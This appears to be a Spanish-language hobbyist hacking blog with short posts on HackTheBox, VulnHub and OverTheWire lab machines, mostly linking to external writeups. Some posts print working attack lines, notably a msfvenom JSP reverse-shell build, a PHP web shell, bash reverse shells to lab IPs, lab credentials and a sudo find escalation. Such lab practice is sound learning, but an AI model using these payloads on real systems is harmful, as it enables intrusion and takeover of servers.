Thursday, October 12, 2023

VulnHub - Cereal 1

 


Una máquina cuyo autor ha hecho hincapié en que sea realista, a costa de ser más difícil. Sigo con el formato visor de google docs, por lo que el documento se verá actualizado en tiempo real mientras lo edito.
https://docs.google.com/document/d/1Llkr3wHfLF_OniHy3G1n8G7uVsevzIls-DeGdKjtDio/edit?usp=sharing 

Sunday, October 8, 2023

VulnHub - MyExpense

 


Paralelamente al repaso intensivo de Hack4u, comienzo a hacer máquinas de VulnHub y descansar un tiempo de HackTheBox. Las máquinas de VulnHub las iré presentando en el formato visor de Google, permitiendo su copia y distribución sin problemas. Se agradecería la citación de fuente, sin ser necesario.

https://docs.google.com/document/d/1icCsuKhcMCc2Es1d1_O2h0rsTy74Jh7EWE4jBMgtokw/edit?usp=sharing   

Monday, June 12, 2023

Auditoría a ecommerce Magento 1.9



Este writeup refleja la forma de vulnerar la seguridad en las primeras versiones de Magento para acceder al servidor web y escalar a privilegios de administrador. El ataque inicial consiste en inyección automatizada mediante script para obtener un usuario web con privilegios de administrador. Y el ataque principal se conoce como Froghopper Attack, básicamente un RCE facilitado por un LFI. La máquina está ofrecida en la versión VIP de HackTheBox y se utilizó originalmente para promocionar el merchandising de la plataforma, por supuesto en una tienda con mayor seguridad.

HackTheBox - SwagShop

Logro: [-=_Link_=-] Writeup (hacker version, dark mode): [-=_Link_=-]

Tuesday, May 23, 2023

htb - Busqueda


Máquina activa bastante sencilla, en la que no se utiliza ninguna técnica o herramienta poco común. Lo que más pruebas ha costado es encontrar cómo funcionan los permisos de usuario para la escalada de privilegios. He descartado crackeo de password de root, atacar el docker y extraer credenciales de la web. No descarto que existan otras vulnerabilidades.


Logro: <a href="https://www.hackthebox.com/achievement/machine/1071573/537" target="_blank" rel="noopener">-=_Link_=-</a>


Writeup: Publicaré cuando se retire la máquina. Peticiones de ayuda por comentarios.

Friday, May 19, 2023

OverTheWire Bandit



https://overthewire.org/wargames/bandit Un CTF de Bash con forma de pivoting en linux. Comienzo por el quinto nivel, al ser los primeros más básicos.

bandit5

ssh bandit5@bandit.labs.overthewire.org -p 2220
find . -type f -readable ! -executable -size 1033c | xargs cat | sed "s/ //g"
find . -type f -readable ! -executable -size 1033c | xargs cat | tr " " ""
find . -type f -readable ! -executable -size 1033c | xargs cat | xargs
Encuentra todos los ficheros, incluso ocultos, desde el actual directorio, que sean de tipo fichero, leibles, no ejecutables, de tamaño 1033 bits (c) y del output muestra el contenido, y de ese contenido sustituye todos (g) los espacios por nada. Tr hace lo mismo de forma más sencilla.

Monday, May 15, 2023

HTB - Mischief

 

Máquina Linux de dificultad Insane en la que llevaba un tiempo atascado pero que pasado cierto punto me ha parecido dificultad media como mucho. Con seguridad se debe a los avances en las herramientas de pentesting, puesto que esta máquina tiene ya cinco años de vida, y este campo evoluciona rápido.

Logro: https://www.hackthebox.com/achievement/machine/1071573/145

Writeup: https://docs.google.com/document/d/e/2PACX-1vTA-1xORwm7Ztook4OQK0HKcnkdO_-oH2BeTXpyYGxobKhrCvo18Wjj7jB8bcsN3exY57rP20Amn3gz/pub


  

Wednesday, May 10, 2023

Saturday, April 15, 2023

HTB - Antique



Flag de root entregada y máquina completada usando DirtyPipe (CVE-2022-0847). Es casi imposible romper con fuerza bruta el hash de la contraseña de root así que he buscado otro tipo de exploits y otro tipo de vulnerabilidades. Máquina no diseñada para ser atacada mediante una vulnerabilidad moderna de kernel (bueno, es de suponer que moderna, no se puede saber cuántos años lleva descubierta y explotada), de la que probablemente sean vulnerables gran parte de las máquinas de HTB.

La dejo pendiente de rootear sin usar PwnKit o DirtyPipe, lo que será un proceso largo y meticuloso. Por supuesto tampoco con Metasploit para mantenerme dentro de las reglas OSCP que no permiten usar Big Red Button hack tools.

Results: https://www.hackthebox.com/achievement/machine/1071573/400

Writeup: https://docs.google.com/document/d/e/2PACX-1vQ5K-CrDHY52R53_2hbTtFh4fEj7e1YUV08rwTuG81_zot3kPxsCMg6nF2FrqnTEEfn0kc3hdHyh4qc/pub

Voy a retomar las máquinas de Active Directory.

 

 

Tuesday, March 28, 2023

HTB - Return



 Return pwned.


Results: <a href="https://www.hackthebox.com/achievement/machine/1071573/401" target="_blank" rel="noopener">Link</a>


Writeup: <a href="https://docs.google.com/document/d/e/2PACX-1vQ9yJWk9DEY_kDNlfRZXaovE6TxZh3ioucwV_yTXsUnQyuszxLouE1SPiIzuEP5TRkhL7X7krLMQcQi/pub" target="_blank" rel="noopener">Link</a>


&nbsp;

Monday, February 27, 2023

HTB - Netmon



Pwned: Link

Writeup (OSCP rules): Link

Hay varios métodos de atacar esta máquina. Aunque el más sencillo pasa por escalar privilegios con Metasploit, también se puede buscar un exploit y ejecutarlo, pero la forma más elegante de explotarlo es mediante una vulnerabilidad detectada en el panel web, que tiene un error de configuración con el que se permite la ejecución remota de código mediante parámetros los de las notificaciones. Es un error crítico que no suele verse en entornos reales, pero puede estar ahí. Con este método intenté crear un usuario privilegiado pero algo fallaba por lo que opté por un payload para abrir un shell reverso con privilegios de super usuario. El writeup se centra en esta última forma.


Monday, January 16, 2023

HTB - Jerry


sudo nmap -sSCV -p- --open -n -Pn -vvv --min-rate 5000 -oA allPorts 10.10.10.95

dirsearch -u 10.10.10.95:8080
https://book.hack tricks.xyz/network-services-pentesting/pentesting-web/tomcat#msfvenom-reverse-shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.8 LPORT=443 -f war -o revshell.war

nc -nvlp 443

Link

Demasiado sencilla incluso para principantes pero un repaso a Tomcat y a msfvenom.

Sunday, January 15, 2023

0xDiablos


Un reto curioso de reversing que me ha llevado varios días.

Link

Hay que quemarse un poco las pestañas con gdb y ghidra pero ha sido bastante divertido.

El writeup lo publicaré cuando se retire el reto.

Saturday, January 7, 2023

Minute 116

Unas vacaciones bastante productivas, permitiéndome resolver dos máquinas que llevaba tiempo con ellas, especialmente Updown que llevaba casi 2 meses con ella, y terminar el recorrido de Starting Point con todas las máquinas VIP, cuyo colofón eran Base, Included y Markup, para las que no habrá writeup por que tienen el suyo oficial.



Thursday, January 5, 2023

HTB - Base / Included / Markup

HTB - Base

Esto no es un WriteUp. Este post solo contiene notas de utilidad, datos exfiltrados y enlaces de investigación para el pentesting de una máquina de pruebas.
This is not a WriteUp. This post only contains utility notes, exfiltrated data and research links for pentesting a test machine.

10.129.95.184

<?php echo system($_REQUEST['cmd']);?>

/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.216/4499 0>&1'

cmd=/bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.15.216/443+0>%261'

$username = "admin";
$password = "thisisagoodpassword";www-data@base:/$

f54846c258f3b4612f78a819573d158e

sudo find . -exec /bin/sh \; -quit

51709519ea18ab37dd6fc58096bea949

Logro: Link



Mudando el hacker blog a blogger

Por motivos laborales he estado bastante inactivo en la publicación de writeups, aunque he continuado haciendo cajas cada cierto tiempo . Du...